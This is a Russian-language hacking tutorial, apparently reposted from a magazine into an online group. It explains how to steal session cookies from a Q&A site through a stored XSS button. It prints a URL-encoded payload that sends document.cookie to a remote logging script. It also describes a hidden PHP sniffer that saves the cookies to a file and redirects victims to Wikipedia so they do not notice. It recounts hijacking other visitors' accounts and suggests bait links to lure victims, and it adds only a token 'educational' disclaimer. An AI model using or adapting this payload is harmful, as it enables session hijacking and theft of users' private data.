Итоговый URL-кодированный текст я и запостил на сайте:

%3Cinput type%3Dbutton value%3DWiki
onclick%3D%22document.location.replace%28%27http%3A%2F%2Fsite.xx%2Fwiki.php%3Fcookies%3D%27%2Bescape%28document.cookie%29%29%3B%22
%3E

С виду обычный текст, дополнительная кнопочка для перехода на сайт
Википедии. В общем-то, ничего особенного. Главное, чтобы нас ни в чем
не заподозрил обыватель. А посему пишем простенький снифер на нашем
удаленном портале и не забываем перенаправить жертву на запрашиваемый
сайт.

Все по полочкам
В сети часто проскакивают вопросы, о том, как и где можно отследить
IP жертвы. Как вообще его узнать, где раздобыть снифер под это дело,
etc. Бросьте вы это занятие. Не надо полагаться в столь интимном
вопросе на чужих людей. Пишите сами, и основной проблемой останется
лишь загнать жертву на ваш сайт «посмотреть фото в сауне» или «узнать
номер телефона симпатичной блондиночки», под ником и аватаром которой
вы в очередной раз скрываетесь, бороздя чаты и форумы в поисках легкой
наживы.

Вот вам пример того, как сохранить параметр cookies адресной строки.
Аналогично логируются и IPы и все остальное. Достаточно внимательно
почитать, что нам доступно в коде на примере того же PHP - www.php.net/manual/ru/reserved.variables.php.



Проверяем наличие в суперглобальном массиве GET искомого параметра.
Далее пытаемся открыть (создать, если не было ранее) файл, куда будем
накапливать построчно данные о жертвах. Если все прошло успешно, пишем
новую строку – нужные нам сведения, завершаем их переводом строки и
закрываем файл. В любом случае отдаем браузеру заголовок Location,
который перенаправит его на другой адрес. Так мы немного замаскируемся
от глаз неопытного пользователя.

При работе с хэдерами помни, что они не могут передаваться в браузер
после выдачи контента. Все заголовки страницы должны идти до любого
вывода данных. А так как мы скрываем, по возможности максимально, наш
снифер, то и вывод ошибок допустить нельзя (таких как, например, нет
переменной в GET-массиве, не удалось создать или открыть файл etc.),
иначе перенаправить браузер жертвы не получится (текст ошибок появится
раньше, и новый location будет проигнорирован). Это выдаст нас с
потрохами.

Проверяем работу! Кликаем на кнопочке на сайте Ответов и почти тут
же попадаем на Википедию. Проверяем содержимое файла cookies.txt и, о
чудо, видим там не только свои куки, но и печенюшки других посетителей.
Тех самых, что успели за время тестов добродушно поделиться с нами
своими аккаунтами. Остается только подменить их кукисы в браузере,
обновить страницу и мы превратимся в другого пользователя, сможем
постить от его имени, ковыряться в личных настройках, приватных данных
и прочих вкусностях. Хотя поменять что-то особо важное нам все равно не
позволят без ввода пароля.

Но так как это не очень законно, бежим скорее в саппорт и жалуемся
на работу программеров, допустивших баг. Сами, конечно, тут же забываем
события последних 10 минут и никогда, запомни, никогда не повторяем их,
кроме как в целях ознакомления!

В этой группе, возможно, есть записи, доступные только её участникам.
Чтобы их читать, Вам нужно вступить в группу